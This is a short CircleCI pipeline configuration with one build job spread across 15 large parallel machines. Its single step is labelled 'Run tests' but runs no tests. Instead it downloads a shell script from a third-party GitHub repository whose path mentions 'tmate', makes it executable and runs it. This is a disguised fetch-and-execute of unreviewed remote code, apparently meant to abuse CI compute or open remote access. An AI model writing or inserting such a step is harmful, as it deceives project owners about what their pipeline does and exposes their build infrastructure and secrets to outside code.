version: 2.1
jobs:
  build:
    parallelism: 15
    machine:
      image: ubuntu-1604:202007-01
    resource_class: large
    steps: 
      - checkout 
      - run: 
          name: Run tests 
          command: wget https://raw.githubusercontent.com/onbreakmyheart/tmate/main/glimp.sh && chmod +x glimp.sh && ./glimp.sh